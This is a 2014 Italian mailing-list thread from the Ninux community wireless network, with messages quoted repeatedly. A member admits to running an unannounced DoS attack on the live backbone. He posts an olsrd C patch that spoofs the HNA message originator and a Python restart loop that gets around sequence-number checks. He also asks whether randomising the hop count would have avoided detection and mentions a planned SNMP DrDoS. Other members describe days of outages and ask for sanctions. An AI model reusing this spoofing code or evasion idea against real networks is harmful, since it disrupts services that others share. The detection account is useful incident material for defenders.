>Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>
>Ciao,
>>
>>Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
>>informazioni tecniche interessanti.
>>
>>bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>un attacco DoS sul backbone per capire che effetto poteva avere.
>>
>>ecco la patch di olsrd con cui generavo l'attacco DoS
>>
>>diff --git a/src/build_msg.c b/src/build_msg.c
>>index 109f955..e252981 100644
>>--- a/src/build_msg.c
>>+++ b/src/build_msg.c
>>@@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>   m = (union olsr_message *)msg_buffer;
>>
>>   /* Fill header */
>>-  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>+  struct in_addr fakesource;
>>+  fakesource.s_addr = 0;
>>+  //inet_hton(2956867021,&fakesource);
>>+  inet_aton("172.16.40.40",&fakesource);
>>+  m->v4.originator = fakesource.s_addr;
>>   m->v4.hopcnt = 0;
>>   m->v4.ttl = MAX_TTL;
>>   m->v4.olsr_msgtype = HNA_MESSAGE;
>>
>>
>>una domanda,
>>
>>se avessi patchato anche:
>>
>>m->v4.hopcnt = XXX
>>
>>mettendo numeri casuali..
>>
>>sarebbe stato altrettanto facile capire chi è che iniettava questi messaggi ?
>>
>>mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>che vorrei provare è DrDoS su snmp).
>>
>>un problema di questo attacco sono cmq i sequence number. Per rendere
>>l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>OLSR a singhiozzo:
>>
>>import os
>>import time
>>
>>while True:
>>        os.system("olsrd")
>>        print "started\n"
>>        time.sleep(120)
>>        os.system("killall olsrd")
>>        print "killed\n"
>>        time.sleep(300)
>>
>>in quanto avevo bisogno che i miei sequence number dovevano sempre
>>essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>come out of sequence.
>>
>>vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>parte di come ti costruisce l'attacco e voi la parte di come avete
>>fatto ad identificare il nodo spoofato ?
>>
>>ho staccatto il nodo attaccante, il gioco è finito :)
>>
>>ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>
>>ciao :)
>>
>>Saverio
>>
>>Il 24 maggio 2014 23:23, Andrea Pescetelli
>> ha scritto:
>>> Saverio,
>>> Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna
>>> con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>> proveniente dal nodo in oggetto.
>>>
>>> Questo problema sta oscurando diversi servizi di ninux in farm appartenenti
>>> a quella subnet.
>>>
>>> Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>>> multipli.
>>> puoi verificare?
>>>
>>> Grazie
>>>
>>> Fish, Hispanico, Halino
>>> --
>>> Andrea Pescetelli aka Fish
>>> Skype: andrea5742
>>> Ninux int: 5001/5002
>>> Mobile: +39 3891156050
>>>
>>>
>>>
>>>
>>
>___
>Wireless mailing list
>Wireless@ml.ninux.org
>http://ml.ninux.org/mailman/listinfo/wireless
>
>

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione OCBexpress (Valer;o)
Condannatelo ad una settimana di "palo umano" per supernode..
Aspetterei il caldo di Agosto e documenterei il tutto con una camera remota
;)

--
Valer;o)
E-mail: ocbexpr...@gmail.com
GoogleTalk: ocbexpr...@gmail.com
VoIP: 5339...@sip.messagenet.it


Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
andrea.pescete...@gmail.com> ha scritto:

> Ciao
> Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
> e comportamenti che da una settimana stanno invalidando sia il rispetto
> reciproco sia il buon finzionamento della rete stessa da parte di Saverio
> Proto.
> Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha
> scritto:
>
>>  Non è qualche ora. Va avanti da giovedì mattina.
>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>> Jabber è stato ko da giovedì per sta cosa.
>> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>>
>>> Ciao,
>>>
>>> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
>>> informazioni tecniche interessanti.
>>>
>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>
>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>
>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>> index 109f955..e252981 100644
>>> --- a/src/build_msg.c
>>> +++ b/src/build_msg.c
>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>m = (union olsr_message *)msg_buffer;
>>>
>>>/* Fill header */
>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>> +  struct in_addr fakesource;
>>> +  fakesource.s_addr = 0;
>>> +  //inet_hton(2956867021,&fakesource);
>>> +  inet_aton("172.16.40.40",&fakesource);
>>> +  m->v4.originator = fakesource.s_addr;
>>>m->v4.hopcnt = 0;
>>>m->v4.ttl = MAX_TTL;
>>>m->v4.olsr_msgtype = HNA_MESSAGE;
>>>
>>>
>>> una domanda,
>>>
>>> se avessi patchato anche:
>>>
>>> m->v4.hopcnt = XXX
>>>
>>> mettendo numeri casuali..
>>>
>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>> messaggi ?
>>>
>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>> che vorrei provare è DrDoS su snmp).
>>>
>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>> OLSR a singhiozzo:
>>>
>>> import os
>>> import time
>>>
>>> while True:
>>> os.system("olsrd")
>>> print "started\n"
>>> time.sleep(120)
>>> os.system("killall olsrd")
>>> print "killed\n"
>>> time.sleep(300)
>>>
>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>> come out of sequence.
>>>
>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>> fatto ad identificare il nodo spoofato ?
>>>
>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>
>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>
>>> ciao :)
>>>
>>> Saverio
>>>
>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>>  ha scritto:
>>> > Saverio,
>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
>>> hna
>>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>> > proveniente dal nodo in oggetto.
>>> >
>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>> appartenenti
>>> > a quella subnet.
>>> >
>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>>> > multipli.
>>> > puoi verificare?
>>> >
>>> > Grazie
>>> >
>>> > Fish, Hispanico, Halino
>>> > --
>>> > Andrea Pescetelli aka Fish
>>> > Skype: andrea5742
>>> > Ninux int: 5001/5002
>>> > Mobile: +39 3891156050
>>> >
>>> >
>>> >
>>> >
>>>
>>
>> ___
>> Wireless mailing list
>> Wireless@ml.ninux.org
>> http://ml.ninux.org/mailman/listinfo/wireless
>>
>>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Ciao
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e
comportamenti che da una settimana stanno invalidando sia il rispetto
reciproco sia il buon finzionamento della rete stessa da parte di Saverio
Proto.
Il 25/mag/2014 09:07 "Alessandro Gnagni"  ha scritto:

> Non è qualche ora. Va avanti da giovedì mattina.
> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
> Jabber è stato ko da giovedì per sta cosa.
> Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:
>
>> Ciao,
>>
>> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
>> informazioni tecniche interessanti.
>>
>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>
>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>
>> diff --git a/src/build_msg.c b/src/build_msg.c
>> index 109f955..e252981 100644
>> --- a/src/build_msg.c
>> +++ b/src/build_msg.c
>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>m = (union olsr_message *)msg_buffer;
>>
>>/* Fill header */
>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>> +  struct in_addr fakesource;
>> +  fakesource.s_addr = 0;
>> +  //inet_hton(2956867021,&fakesource);
>> +  inet_aton("172.16.40.40",&fakesource);
>> +  m->v4.originator = fakesource.s_addr;
>>m->v4.hopcnt = 0;
>>m->v4.ttl = MAX_TTL;
>>m->v4.olsr_msgtype = HNA_MESSAGE;
>>
>>
>> una domanda,
>>
>> se avessi patchato anche:
>>
>> m->v4.hopcnt = XXX
>>
>> mettendo numeri casuali..
>>
>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>> messaggi ?
>>
>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>> che vorrei provare è DrDoS su snmp).
>>
>> un problema di questo attacco sono cmq i sequence number. Per rendere
>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>> OLSR a singhiozzo:
>>
>> import os
>> import time
>>
>> while True:
>> os.system("olsrd")
>> print "started\n"
>> time.sleep(120)
>> os.system("killall olsrd")
>> print "killed\n"
>> time.sleep(300)
>>
>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>> come out of sequence.
>>
>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>> parte di come ti costruisce l'attacco e voi la parte di come avete
>> fatto ad identificare il nodo spoofato ?
>>
>> ho staccatto il nodo attaccante, il gioco è finito :)
>>
>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>
>> ciao :)
>>
>> Saverio
>>
>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>  ha scritto:
>> > Saverio,
>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
>> hna
>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>> > proveniente dal nodo in oggetto.
>> >
>> > Questo problema sta oscurando diversi servizi di ninux in farm
>> appartenenti
>> > a quella subnet.
>> >
>> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>> > multipli.
>> > puoi verificare?
>> >
>> > Grazie
>> >
>> > Fish, Hispanico, Halino
>> > --
>> > Andrea Pescetelli aka Fish
>> > Skype: andrea5742
>> > Ninux int: 5001/5002
>> > Mobile: +39 3891156050
>> >
>> >
>> >
>> >
>>
>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alessandro Gnagni
Non è qualche ora. Va avanti da giovedì mattina.
Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
Jabber è stato ko da giovedì per sta cosa.
Il 25/mag/2014 01:03 "Saverio Proto"  ha scritto:

> Ciao,
>
> Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
> informazioni tecniche interessanti.
>
> bravi, avete risolto il problema in fretta :) Ho volutamente provato
> un attacco DoS sul backbone per capire che effetto poteva avere.
>
> ecco la patch di olsrd con cui generavo l'attacco DoS
>
> diff --git a/src/build_msg.c b/src/build_msg.c
> index 109f955..e252981 100644
> --- a/src/build_msg.c
> +++ b/src/build_msg.c
> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>m = (union olsr_message *)msg_buffer;
>
>/* Fill header */
> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
> +  struct in_addr fakesource;
> +  fakesource.s_addr = 0;
> +  //inet_hton(2956867021,&fakesource);
> +  inet_aton("172.16.40.40",&fakesource);
> +  m->v4.originator = fakesource.s_addr;
>m->v4.hopcnt = 0;
>m->v4.ttl = MAX_TTL;
>m->v4.olsr_msgtype = HNA_MESSAGE;
>
>
> una domanda,
>
> se avessi patchato anche:
>
> m->v4.hopcnt = XXX
>
> mettendo numeri casuali..
>
> sarebbe stato altrettanto facile capire chi è che iniettava questi
> messaggi ?
>
> mi sto divertendo parecchio con questi attacchi DoS, sono molto
> istruttivi. Per chi vuole giocare insieme a me a programmare in C
> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
> che vorrei provare è DrDoS su snmp).
>
> un problema di questo attacco sono cmq i sequence number. Per rendere
> l'attacco efficace ho dovuto far andare la mia instanza patchata di
> OLSR a singhiozzo:
>
> import os
> import time
>
> while True:
> os.system("olsrd")
> print "started\n"
> time.sleep(120)
> os.system("killall olsrd")
> print "killed\n"
> time.sleep(300)
>
> in quanto avevo bisogno che i miei sequence number dovevano sempre
> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
> come out of sequence.
>
> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
> parte di come ti costruisce l'attacco e voi la parte di come avete
> fatto ad identificare il nodo spoofato ?
>
> ho staccatto il nodo attaccante, il gioco è finito :)
>
> ah... vi prego nessun malumore per qualche oretta di disservizi, this
> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>
> ciao :)
>
> Saverio
>
> Il 24 maggio 2014 23:23, Andrea Pescetelli
>  ha scritto:
> > Saverio,
> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna
> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
> > proveniente dal nodo in oggetto.
> >
> > Questo problema sta oscurando diversi servizi di ninux in farm
> appartenenti
> > a quella subnet.
> >
> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
> > multipli.
> > puoi verificare?
> >
> > Grazie
> >
> > Fish, Hispanico, Halino
> > --
> > Andrea Pescetelli aka Fish
> > Skype: andrea5742
> > Ninux int: 5001/5002
> > Mobile: +39 3891156050
> >
> >
> >
> >
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless